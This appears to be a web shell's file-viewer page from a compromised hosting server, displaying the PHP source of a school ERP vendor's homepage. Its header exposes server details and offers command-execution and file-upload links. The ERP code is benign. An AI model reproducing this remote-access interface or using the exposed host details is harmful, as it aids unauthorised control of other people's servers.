|
Server IP : 2a02:4780:3:2287:0:3736:a38e:8 / Your IP : 216.73.216.142 Web Server : LiteSpeed System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64 User : u926327694 ( 926327694) PHP Version : 7.4.33 Disable Function : system, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u926327694/domains/smsoft.in/public_html/demo/src/../../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
require_once __DIR__ . '/config.php';
$page_meta_desc = "Transform your school operations with E Vision Infotech's Smart Campus Management ERP. Comprehensive solution for schools & colleges with attendance, fees, exams & more.";
$current_page = 'index';
?>
<?php include __DIR__ . '/includes/header.php'; ?>
<!-- Hero Section with Slider -->
<div id="heroSlider" class="carousel slide" data-ride="carousel" data-interval="5000" style="background: #000;">
<ol class="carousel-indicators">
<li data-target="#heroSlider" data-slide-to="0" class="active"></li>
<li data-target="#heroSlider" data-slide-to="1"></li>
</ol>
<div class="carousel-inner">
<!-- Slide 1 -->
<div class="carousel-item active">
<img src="assets/images/slider/01.jpg" alt="ERP" style="width: 100%; height: 550px; object-fit: cover; filter: brightness(0.6);">
<div class="carousel-caption">
<h1 style="font-size: 2.2rem; font-weight: 700; margin-bottom: 10px;">Smart Management Software (ERP)</h1>
<p style="font-size: 1.2rem; margin-bottom: 20px;">For School / College / Institutes</p>
<a href="contact-us.php" class="btn btn-primary mr-2">Book a Demo</a>
<a href="features.php" class="btn btn-outline-light">View Features</a>
</div>
</div>
<!-- Slide 2 -->
<div class="carousel-item">
<img src="assets/images/slider/02.jpg" alt="Modules" style="width: 100%; height: 550px; object-fit: cover; filter: brightness(0.6);">
<div class="carousel-caption">
<h1 style="font-size: 2.2rem; font-weight: 700; margin-bottom: 10px;">Complete School Management Modules</h1>
<p style="font-size: 1.2rem; margin-bottom: 20px;">Finance, Student, Exam, Staff, Library & More</p>
<a href="services.php" class="btn btn-primary mr-2">Our Services</a>
<a href="contact-us.php" class="btn btn-outline-light">Contact Us</a>
</div>
</div>
</div>
<a class="carousel-control-prev" href="#heroSlider" role="button" data-slide="prev">
<span class="carousel-control-prev-icon"></span>
</a>
<a class="carousel-control-next" href="#heroSlider" role="button" data-slide="next">
<span class="carousel-control-next-icon"></span>
</a>
</div>
<style>
.carousel-item img { width: 100%; height: 550px; object-fit: cover; }
.carousel-caption { top: 50% !important; transform: translateY(-50%) !important; left: 0; right: 0; }
.carousel-indicators { bottom: 20px; }
.carousel-indicators li { background: rgba(255,255,255,0.5); }
.carousel-indicators li.active { background: #fff; }
.carousel-control-prev, .carousel-control-next { top: 50%; filter: none; }
@media (max-width: 768px) {
.carousel-item img { height: 400px; }
.carousel-caption { transform: translateY(-50%) !important; padding: 10px; }
.carousel-caption h1 { font-size: 1.3rem !important; }
.carousel-caption p { font-size: 0.9rem !important; margin-bottom: 10px; }
}
</style>
<!-- About Us Section -->
<section class="section-padding section-reveal" style="background: #fff;">
<div class="container">
<div class="row align-items-center">
<div class="col-lg-6 mb-4 mb-lg-0 animate-on-scroll fade-in-left">
<img src="assets/images/aboutus.jpg" alt="About E Vision Infotech" style="width: 100%; border-radius: 16px; box-shadow: 0 10px 30px rgba(0,0,0,0.1);">
</div>
<div class="col-lg-6 animate-on-scroll fade-in-bottom">
<h2 style="font-size: 1.75rem; font-weight: 700; color: #1f2937; margin-bottom: 15px;">ABOUT <span style="color: #2563eb;">US</span></h2>
<p style="color: #4b5563; font-size: 1rem; line-height: 1.7; margin-bottom: 20px;">
We are excited to introduce you to Smart Campus Management by E Vision Infotech, a comprehensive school management solution designed to streamline your school's/college operations. Our ERP system is tailored to meet the unique needs of educational institutions, providing an all-in-one platform to manage various aspects of school administration.
</p>
<h4 style="font-size: 1.2rem; font-weight: 600; color: #1f2937; margin-bottom: 15px;">The Need for School and College Management</h4>
<p style="color: #6b7280; font-size: 0.95rem; line-height: 1.7; margin-bottom: 20px;">
School or college management is essential for ensuring smooth and efficient operations, regardless of the institution's size. A well-organized management system provides structure, allowing administrators to focus on the educational development of students rather than administrative burdens. With effective management, schools can streamline tasks such as admissions, attendance tracking, fee collection, and communication with parents and staff.
</p>
<a href="about-us.php" class="btn btn-primary">Learn More <i class="fas fa-arrow-right ml-2"></i></a>
</div>
</div>
</div>
</section>
<!-- Software Modules Section -->
<section class="section-padding section-reveal" style="background: #f8f9fa;">
<div class="container">
<div class="text-center mb-5">
<h2 class="section-title" style="font-size: 2rem; font-weight: 700; color: #1f2937; margin-bottom: 10px;">Software Modules</h2>
<p style="color: #6b7280; font-size: 1.1rem;">Comprehensive ERP for School & College Management</p>
</div>
<div class="row">
<?php
$modules = [
['icon' => 'fa-wallet', 'title' => 'Finance', 'desc' => 'School/College finance manages budgets, fees, expenses, and financial reporting efficiently.', 'features' => ['Budget Management', 'Fees Collection', 'Income & Expenses', 'Inventory', 'Reports']],
['icon' => 'fa-user-graduate', 'title' => 'Student', 'desc' => "Students' data, attendance, performance, and activities are efficiently managed, ensuring smooth operations.", 'features' => ['Admission Management', 'Attendance Tracking', 'Performance Records', 'Activity Management', 'Parent Communication']],
['icon' => 'fa-file-alt', 'title' => 'Exam', 'desc' => 'School ERP tracks student exams, schedules, performance, and result analysis.', 'features' => ['Exam Scheduling', 'Marks Entry', 'Result Analysis', 'Report Cards', 'Online Exams', 'Exam Modules Ready for State / CBSE / PU']],
['icon' => 'fa-users', 'title' => 'Staff', 'desc' => 'Staff management handles payroll, attendance, roles, and performance tracking efficiently.', 'features' => ['Payroll Management', 'Attendance', 'Leave Management', 'Performance Tracking', 'Role Management']],
['icon' => 'fa-book-open', 'title' => 'Library', 'desc' => 'Library management organizes book inventory, checkouts, returns, and availability tracking.', 'features' => ['Book Inventory', 'Member Management', 'Issue/Return', 'Late Fee Calculation', 'Digital Catalog']],
['icon' => 'fa-mobile-alt', 'title' => 'Student App', 'desc' => 'Student app provides access to attendance, grades, schedules, and communication.', 'features' => ['View Attendance', 'Exam Results', 'Fee Status', 'Notifications', 'Communication']],
['icon' => 'fa-bus', 'title' => 'Transport', 'desc' => 'Supporting apps manage transportation management.', 'features' => ['Route Management', 'Bus Tracking', 'Driver Details', 'Student Pickup', 'Live Location']],
['icon' => 'fa-home', 'title' => 'Hostel', 'desc' => 'Supporting apps manage hostel facilities.', 'features' => ['Room Allocation', 'Mess Management', 'Visitor Log', 'Complaint Box', 'Attendance', 'Biometric Device']],
['icon' => 'fa-certificate', 'title' => 'Certificate', 'desc' => 'Supporting apps manage certificates and CMS.', 'features' => ['TC Generation', 'Bonafide Certificate', 'Character Certificate', 'Custom Templates', 'Bulk Generation']]
];
?>
<?php foreach($modules as $index => $module): ?>
<div class="col-lg-4 col-md-6 mb-4 stagger-card" data-delay="<?php echo $index; ?>">
<div class="card h-100" style="border-radius: 12px; box-shadow: 0 4px 12px rgba(0,0,0,0.08); border: none;">
<div class="p-4" style="background: #fff;">
<div style="width: 50px; height: 50px; background: linear-gradient(135deg, #2563eb, #4f46e5); border-radius: 12px; display: flex; align-items: center; justify-content: center; margin-bottom: 15px;">
<i class="fas <?php echo $module['icon']; ?>" style="font-size: 1.25rem; color: #fff;"></i>
</div>
<h5 style="font-weight: 600; color: #1f2937; margin-bottom: 8px;"><?php echo $module['title']; ?></h5>
<p style="color: #6b7280; font-size: 0.8rem; margin-bottom: 10px; line-height: 1.5;"><?php echo $module['desc']; ?></p>
<ul style="list-style: none; padding: 0; margin: 0;">
<?php foreach($module['features'] as $feature): ?>
<li style="padding: 4px 0; font-size: 0.8rem; color: #4b5563; display: flex; align-items: center;">
<i class="fas fa-check-circle" style="color: #16a34a; margin-right: 8px; font-size: 0.9rem;"></i>
<?php echo $feature; ?>
</li>
<?php endforeach; ?>
</ul>
</div>
</div>
</div>
<?php endforeach; ?>
</div>
<div class="text-center mt-4">
<a href="features.php" class="btn btn-primary">View All Modules <i class="fas fa-arrow-right ml-2"></i></a>
</div>
</div>
</section>
<!-- Why Choose Us Section -->
<section class="section-padding section-reveal">
<div class="container">
<div class="row align-items-center">
<div class="col-lg-6 mb-4 animate-on-scroll fade-in-left">
<h2 style="font-size: 1.75rem; font-weight: 700; color: #1f2937; margin-bottom: 15px;">
Why Educational Institutions Choose E Vision Infotech
</h2>
<p style="color: #6b7280; font-size: 1rem; margin-bottom: 20px;">
We understand the unique challenges of managing educational institutions. Our ERP solution simplifies operations and enhances productivity.
</p>
<div class="mb-3 d-flex align-items-center">
<div style="width: 50px; height: 50px; background: #dbeafe; border-radius: 10px; display: flex; align-items: center; justify-content: center; margin-right: 15px; flex-shrink: 0;">
<i class="fas fa-rocket" style="color: #2563eb; font-size: 1.25rem;"></i>
</div>
<div>
<h5 style="font-weight: 600; color: #1f2937; margin-bottom: 3px;">Easy to Use</h5>
<p style="color: #6b7280; font-size: 0.875rem; margin: 0;">Intuitive interface with minimal training</p>
</div>
</div>
<div class="mb-3 d-flex align-items-center">
<div style="width: 50px; height: 50px; background: #dcfce7; border-radius: 10px; display: flex; align-items: center; justify-content: center; margin-right: 15px; flex-shrink: 0;">
<i class="fas fa-shield-alt" style="color: #16a34a; font-size: 1.25rem;"></i>
</div>
<div>
<h5 style="font-weight: 600; color: #1f2937; margin-bottom: 3px;">Secure & Reliable</h5>
<p style="color: #6b7280; font-size: 0.875rem; margin: 0;">Enterprise-grade security</p>
</div>
</div>
<div class="d-flex align-items-center">
<div style="width: 50px; height: 50px; background: #f3e8ff; border-radius: 10px; display: flex; align-items: center; justify-content: center; margin-right: 15px; flex-shrink: 0;">
<i class="fas fa-headset" style="color: #9333ea; font-size: 1.25rem;"></i>
</div>
<div>
<h5 style="font-weight: 600; color: #1f2937; margin-bottom: 3px;">24/7 Support</h5>
<p style="color: #6b7280; font-size: 0.875rem; margin: 0;">Dedicated support team</p>
</div>
</div>
</div>
<div class="col-lg-6">
<div class="row">
<div class="col-6 mb-3 animate-on-scroll fade-in-up" data-delay="1">
<div style="background: linear-gradient(135deg, #2563eb, #1d4ed8); border-radius: 15px; padding: 25px; text-align: center; color: #fff; transition: transform 0.3s ease;" class="hover-lift">
<i class="fas fa-fingerprint" style="font-size: 2rem; margin-bottom: 10px; opacity: 0.9;"></i>
<h5 style="font-weight: 600; margin-bottom: 5px;">Biometric</h5>
<p style="font-size: 0.8rem; opacity: 0.8; margin: 0;">Attendance</p>
</div>
</div>
<div class="col-6 mb-3 animate-on-scroll fade-in-up" data-delay="2">
<div style="background: linear-gradient(135deg, #16a34a, #15803d); border-radius: 15px; padding: 25px; text-align: center; color: #fff; transition: transform 0.3s ease;" class="hover-lift">
<i class="fab fa-whatsapp" style="font-size: 2rem; margin-bottom: 10px; opacity: 0.9;"></i>
<h5 style="font-weight: 600; margin-bottom: 5px;">WhatsApp</h5>
<p style="font-size: 0.8rem; opacity: 0.8; margin: 0;">Communication</p>
</div>
</div>
<div class="col-6 animate-on-scroll fade-in-up" data-delay="3">
<div style="background: linear-gradient(135deg, #9333ea, #7e22ce); border-radius: 15px; padding: 25px; text-align: center; color: #fff; transition: transform 0.3s ease;" class="hover-lift">
<i class="fas fa-globe" style="font-size: 2rem; margin-bottom: 10px; opacity: 0.9;"></i>
<h5 style="font-weight: 600; margin-bottom: 5px;">Web Based</h5>
<p style="font-size: 0.8rem; opacity: 0.8; margin: 0;">Access Anywhere</p>
</div>
</div>
<div class="col-6">
<div style="background: linear-gradient(135deg, #ea580c, #c2410c); border-radius: 15px; padding: 25px; text-align: center; color: #fff;">
<i class="fas fa-mobile-alt" style="font-size: 2rem; margin-bottom: 10px; opacity: 0.9;"></i>
<h5 style="font-weight: 600; margin-bottom: 5px;">Mobile App</h5>
<p style="font-size: 0.8rem; opacity: 0.8; margin: 0;">iOS & Android</p>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- Services Section -->
<section class="section-reveal" style="padding: 60px 0; background: #f8f9fa;">
<div class="container">
<div class="text-center mb-5">
<h2 class="section-title" style="font-size: 2rem; font-weight: 700; color: #1f2937; margin-bottom: 10px;">Our Services</h2>
<p style="color: #6b7280; font-size: 1.1rem;">Comprehensive digital solutions for educational institutions</p>
</div>
<div class="row">
<?php
$services = [
['icon' => 'fa-laptop-code', 'title' => 'Web Development', 'desc' => 'Custom websites with responsive design'],
['icon' => 'fa-server', 'title' => 'Hosting Services', 'desc' => 'Secure & reliable hosting'],
['icon' => 'fa-bullhorn', 'title' => 'Digital Marketing', 'desc' => 'Increase visibility & engagement'],
['icon' => 'fa-comments', 'title' => 'WhatsApp Communication', 'desc' => 'Automated messaging to parents'],
['icon' => 'fa-mobile-alt', 'title' => 'Android Apps', 'desc' => 'Mobile access for all users'],
['icon' => 'fa-headset', 'title' => '24/7 Support', 'desc' => 'Round-the-clock customer care']
];
foreach($services as $service): ?>
<div class="col-lg-4 col-md-6 mb-4">
<div class="card h-100 text-center p-4" style="border-radius: 12px; box-shadow: 0 4px 12px rgba(0,0,0,0.08); border: none;">
<div style="width: 60px; height: 60px; background: linear-gradient(135deg, #2563eb, #4f46e5); border-radius: 12px; display: flex; align-items: center; justify-content: center; margin: 0 auto 15px;">
<i class="fas <?php echo $service['icon']; ?>" style="font-size: 1.5rem; color: #fff;"></i>
</div>
<h5 style="font-weight: 600; color: #1f2937; margin-bottom: 5px;"><?php echo $service['title']; ?></h5>
<p style="color: #6b7280; font-size: 0.875rem; margin: 0;"><?php echo $service['desc']; ?></p>
</div>
</div>
<?php endforeach; ?>
</div>
</div>
</section>
<!-- Pricing Section -->
<section class="section-reveal" style="padding: 60px 0;">
<div class="container">
<div class="text-center mb-5">
<h2 class="section-title" style="font-size: 2rem; font-weight: 700; color: #1f2937; margin-bottom: 10px;">Flexible Pricing Plans</h2>
<p style="color: #6b7280; font-size: 1.1rem;">Choose the perfect plan for your institution</p>
</div>
<div class="row">
<?php
foreach($pricing_plans as $index => $plan): ?>
<div class="col-lg-3 col-md-6 mb-4">
<div class="card h-100 text-center p-4" style="border-radius: 16px; box-shadow: 0 10px 25px rgba(0,0,0,0.1); border: <?php echo $index === 2 ? '2px solid #2563eb' : 'none'; ?>;">
<?php if($index === 2): ?>
<span style="position: absolute; top: -12px; left: 50%; transform: translateX(-50%); background: #2563eb; color: #fff; padding: 4px 12px; border-radius: 20px; font-size: 0.75rem; font-weight: 600;">Most Popular</span>
<?php endif; ?>
<h5 style="font-weight: 600; color: #1f2937; margin-bottom: 10px;"><?php echo $plan['name']; ?></h5>
<?php /*
<div style="margin-bottom: 20px;">
<span style="font-size: 2rem; font-weight: 700; color: #2563eb;">₹<?php echo $plan['price']; ?></span>
<span style="color: #6b7280; font-size: 0.875rem;">/student/year</span>
</div>
*/ ?>
<ul class="text-left" style="list-style: none; padding: 0; margin-bottom: 20px;">
<?php foreach($plan['features'] as $feature): ?>
<li style="padding: 5px 0; font-size: 0.875rem; color: #4b5563; display: flex; align-items: center;">
<i class="fas fa-check" style="color: #16a34a; margin-right: 8px;"></i>
<?php echo $feature; ?>
</li>
<?php endforeach; ?>
</ul>
<a href="contact-us.php" class="btn btn-primary btn-block">Get Started</a>
</div>
</div>
<?php endforeach; ?>
</div>
</div>
</section>
<!-- Hardware Products Section -->
<section class="section-reveal" style="padding: 60px 0; background: #111827; color: #fff;">
<div class="container">
<div class="text-center mb-5">
<h2 class="section-title" style="font-size: 2rem; font-weight: 700; margin-bottom: 10px;">Hardware Products</h2>
<p style="color: #9ca3af; font-size: 1.1rem;">Our hardware products are integrated with our ERP software for seamless functionality</p>
</div>
<div class="row">
<div class="col-lg-3 col-md-6 mb-4">
<div class="card h-100 p-4" style="background: #1f2937; border-radius: 16px; border: 1px solid #374151;">
<img src="assets/images/team/01.jpg" alt="STL Online Biometric" style="width: 100%; height: 140px; object-fit: cover; border-radius: 12px; margin-bottom: 15px;">
<h5 style="font-weight: 600; margin-bottom: 8px;">STL Online Biometric</h5>
<p style="color: #9ca3af; font-size: 0.8rem; line-height: 1.6; margin: 0;">Staff and students can take attendance using thumb or RFID cards with indoor biometric systems, offering connectivity through Wi-Fi, SIM, or LAN for seamless operation.</p>
</div>
</div>
<div class="col-lg-3 col-md-6 mb-4">
<div class="card h-100 p-4" style="background: #1f2937; border-radius: 16px; border: 1px solid #374151;">
<img src="assets/images/team/02.jpg" alt="School Automatic Bell" style="width: 100%; height: 140px; object-fit: cover; border-radius: 12px; margin-bottom: 15px;">
<h5 style="font-weight: 600; margin-bottom: 8px;">School Automatic Bell</h5>
<p style="color: #9ca3af; font-size: 0.8rem; line-height: 1.6; margin: 0;">School Automatic Bell system helps automate daily school schedules by ringing bells accurately for periods, breaks, and assemblies. It reduces manual effort and ensures perfect timing every day without fail.</p>
</div>
</div>
<div class="col-lg-3 col-md-6 mb-4">
<div class="card h-100 p-4" style="background: #1f2937; border-radius: 16px; border: 1px solid #374151;">
<img src="assets/images/team/03.jpg" alt="ID Cards" style="width: 100%; height: 140px; object-fit: cover; border-radius: 12px; margin-bottom: 15px;">
<h5 style="font-weight: 600; margin-bottom: 8px;">ID CARDS</h5>
<p style="color: #9ca3af; font-size: 0.8rem; line-height: 1.6; margin: 0;">ID cards enable smart attendance using RFID and UHF technology, allowing seamless scanning with biometric devices for accurate attendance tracking.</p>
</div>
</div>
<div class="col-lg-3 col-md-6 mb-4">
<div class="card h-100 p-4" style="background: #1f2937; border-radius: 16px; border: 1px solid #374151;">
<img src="assets/images/team/04.jpg" alt="Offline Biometric" style="width: 100%; height: 140px; object-fit: cover; border-radius: 12px; margin-bottom: 15px;">
<h5 style="font-weight: 600; margin-bottom: 8px;">Offline Biometric</h5>
<p style="color: #9ca3af; font-size: 0.8rem; line-height: 1.6; margin: 0;">The offline biometric system is designed for desktop use with offline software. It supports face and thumb recognition, offering connectivity through LAN, Wi-Fi, or USB pendrive.</p>
</div>
</div>
</div>
</div>
</section>
<!-- Testimonials Section -->
<section class="section-reveal" style="padding: 60px 0; background: #f8f9fa;">
<div class="container">
<div class="text-center mb-5">
<h2 class="section-title" style="font-size: 2rem; font-weight: 700; color: #1f2937; margin-bottom: 10px;">What Our Clients Say</h2>
</div>
<div class="row">
<div class="col-md-4 mb-4">
<div class="card h-100 p-4" style="border-radius: 16px; box-shadow: 0 4px 15px rgba(0,0,0,0.08); border: none;">
<div style="margin-bottom: 15px;">
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
</div>
<p style="color: #4b5563; font-size: 0.95rem; line-height: 1.7; margin-bottom: 20px; font-style: italic;">"Smart Campus Management ERP has streamlined our school's operations with easy attendance tracking, instant parent communication, and efficient data management. It's user-friendly and has greatly improved productivity. Highly recommended for schools aiming to boost efficiency."</p>
<div class="d-flex align-items-center">
<div style="width: 50px; height: 50px; background: linear-gradient(135deg, #2563eb, #4f46e5); border-radius: 50%; display: flex; align-items: center; justify-content: center; margin-right: 12px; flex-shrink: 0;">
<span style="color: #fff; font-weight: 600;">A</span>
</div>
<div>
<h6 style="font-weight: 600; color: #1f2937; margin-bottom: 2px;">A.S.S CAMPUS</h6>
<p style="color: #6b7280; font-size: 0.8rem; margin: 0;">Administrator</p>
</div>
</div>
</div>
</div>
<div class="col-md-4 mb-4">
<div class="card h-100 p-4" style="border-radius: 16px; box-shadow: 0 4px 15px rgba(0,0,0,0.08); border: none;">
<div style="margin-bottom: 15px;">
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
</div>
<p style="color: #4b5563; font-size: 0.95rem; line-height: 1.7; margin-bottom: 20px; font-style: italic;">"Smart Campus Management ERP has simplified our school's daily tasks, making attendance tracking, parent communication, and data management seamless. It's efficient, user-friendly, and a great tool for improving overall school operations."</p>
<div class="d-flex align-items-center">
<div style="width: 50px; height: 50px; background: linear-gradient(135deg, #16a34a, #15803d); border-radius: 50%; display: flex; align-items: center; justify-content: center; margin-right: 12px; flex-shrink: 0;">
<span style="color: #fff; font-weight: 600;">S</span>
</div>
<div>
<h6 style="font-weight: 600; color: #1f2937; margin-bottom: 2px;">Shri Jagadamba Vidya Vardhak Sangh</h6>
<p style="color: #6b7280; font-size: 0.8rem; margin: 0;">Admin</p>
</div>
</div>
</div>
</div>
<div class="col-md-4 mb-4">
<div class="card h-100 p-4" style="border-radius: 16px; box-shadow: 0 4px 15px rgba(0,0,0,0.08); border: none;">
<div style="margin-bottom: 15px;">
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
<i class="fas fa-star" style="color: #fbbf24;"></i>
</div>
<p style="color: #4b5563; font-size: 0.95rem; line-height: 1.7; margin-bottom: 20px; font-style: italic;">"The accounts module in Smart Campus Management ERP simplifies fee collection, tracks payments, and generates real-time reports. It's user-friendly, efficient, and helps streamline our school's financial management."</p>
<div class="d-flex align-items-center">
<div style="width: 50px; height: 50px; background: linear-gradient(135deg, #9333ea, #7e22ce); border-radius: 50%; display: flex; align-items: center; justify-content: center; margin-right: 12px; flex-shrink: 0;">
<span style="color: #fff; font-weight: 600;">V</span>
</div>
<div>
<h6 style="font-weight: 600; color: #1f2937; margin-bottom: 2px;">VIDYASHREE English Medium School</h6>
<p style="color: #6b7280; font-size: 0.8rem; margin: 0;">Account Section</p>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- Statistics Section -->
<section class="section-reveal" style="padding: 50px 0; background: linear-gradient(135deg, #2563eb, #4f46e5);">
<div class="container">
<div class="row text-center text-white">
<div class="col-6 col-md-3 mb-4 animate-on-scroll fade-in-up" data-delay="0">
<i class="fas fa-thumbs-up" style="font-size: 2rem; margin-bottom: 10px; opacity: 0.9;"></i>
<div class="stat-number" style="font-size: 2.5rem; font-weight: 700;">250+</div>
<div style="font-size: 1rem; opacity: 0.9;">Happy Clients</div>
</div>
<div class="col-6 col-md-3 mb-4 animate-on-scroll fade-in-up" data-delay="1">
<i class="fas fa-briefcase" style="font-size: 2rem; margin-bottom: 10px; opacity: 0.9;"></i>
<div class="stat-number" style="font-size: 2.5rem; font-weight: 700;">10+</div>
<div style="font-size: 1rem; opacity: 0.9;">Completed Projects</div>
</div>
<div class="col-6 col-md-3 mb-4 animate-on-scroll fade-in-up" data-delay="2">
<i class="fas fa-users" style="font-size: 2rem; margin-bottom: 10px; opacity: 0.9;"></i>
<div class="stat-number" style="font-size: 2.5rem; font-weight: 700;">300+</div>
<div style="font-size: 1rem; opacity: 0.9;">Clients</div>
</div>
<div class="col-6 col-md-3 mb-4 animate-on-scroll fade-in-up" data-delay="3">
<i class="fas fa-user-friends" style="font-size: 2rem; margin-bottom: 10px; opacity: 0.9;"></i>
<div class="stat-number" style="font-size: 2.5rem; font-weight: 700;">25+</div>
<div style="font-size: 1rem; opacity: 0.9;">Team Size</div>
</div>
</div>
</div>
</section>
<!-- CTA Section -->
<section class="section-reveal" style="padding: 70px 0; background: linear-gradient(135deg, #1e3a8a, #3b82f6);">
<div class="container text-center text-white">
<h2 class="animate-on-scroll fade-in-up" style="font-size: 2.25rem; font-weight: 700; margin-bottom: 15px;">Ready to Transform Your Institution?</h2>
<p style="font-size: 1.2rem; margin-bottom: 30px; opacity: 0.9;">Join hundreds of schools benefiting from our ERP solution</p>
<div class="d-flex justify-content-center flex-wrap" style="gap: 15px;">
<a href="contact-us.php" class="btn btn-light btn-lg" style="padding: 12px 30px; border-radius: 8px; font-weight: 600;">Schedule a Demo</a>
<a href="tel:<?php echo PHONE; ?>" class="btn btn-outline-light btn-lg" style="padding: 12px 30px; border-radius: 8px; font-weight: 600; border: 2px solid #fff;">
<i class="fas fa-phone-alt mr-2"></i> Call Now: <?php echo PHONE; ?>
</a>
</div>
</div>
</section>
<!-- Bootstrap JS -->
<script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script>
<?php include __DIR__ . '/includes/footer.php'; ?>